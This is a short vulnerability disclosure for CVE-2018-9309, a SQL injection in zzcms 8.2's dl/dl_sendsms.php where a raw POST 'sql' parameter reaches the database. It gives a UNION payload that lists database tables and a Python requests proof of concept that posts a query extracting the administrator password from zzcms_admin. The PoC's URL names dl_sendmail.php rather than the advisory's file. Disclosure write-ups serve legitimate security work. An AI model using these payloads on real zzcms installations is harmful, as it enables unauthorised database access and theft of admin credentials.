Headline
CVE-2018-9309: vulnerability/dl_sendsms.php.md at master · lihonghuyang/vulnerability
An issue was discovered in zzcms 8.2. It allows SQL injection via the id parameter in a dl/dl_sendsms.php request.
/dl/dl_sendsms.php****Edition
zzcms 8.2
Location
/dl/dl_sendsms.php
Code
$sql2=$sql." order by id asc limit $n,$size";
Rows:73****Harm
can get password through SQL injection
Cause the cause Take a look at the logic of the bug,If the POST request is not empty, the $sql value will be equal to $_POST[“sql”], $sql will be assigned to $sql2, $sql2=$sql." order by id asc limit $n,$size";
$sql not added ' ' This will cause SQL inject
Construct payload verification
sql=select email from zzcms_dl where id=-1 union select group_concat(distinct table_name) from information_schema.columns where table_schema=database()#
poc
import requests import string
url = “http://192.168.199.23/dl/dl_sendmail.php” cookies = { 'UserName’:’1234’,’PassWord’:’81dc9bdb52d04dc20036dbd8313ed055’} flag = ‘’
data = { ‘sql’:’select email from zzcms_dl where id=-1 union select pass from zzcms_admin #’ }
r = requests.post(url,data,cookies=cookies) r.encoding = ‘utf-8’ print(r.text)
[6]
Get the administrator password
[6]: ./images/6.png “6”